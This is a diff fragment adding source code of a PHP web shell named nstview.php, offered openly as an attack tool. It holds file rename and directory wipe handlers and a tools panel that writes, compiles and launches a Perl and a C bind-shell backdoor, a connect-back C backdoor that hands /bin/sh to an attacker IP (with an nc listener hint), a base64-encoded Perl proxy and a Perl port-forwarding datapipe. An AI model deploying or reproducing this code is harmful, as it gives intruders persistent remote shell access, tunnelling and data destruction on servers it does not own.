+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("/tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru(".nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("/tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru(".nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## �������� ��� ������� (1-��, 0-���)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"������ ������� ����� ��� ����������: \$!\";
+
+print \"�������� ���������� �����.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"�������� ��������� accept: \$!\n\";
+                next;
+        }
+
+        printf(\"����� ������: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"���������� ��������� fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## ����� �������
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ������ �������, ��������� �����.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: ������ �������� �� \$o->{'tohost'}, ���� \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: ������� �������� �� %s, ���� %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: �������� �������� ��� ����� \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: �������� ����.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: ������ Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
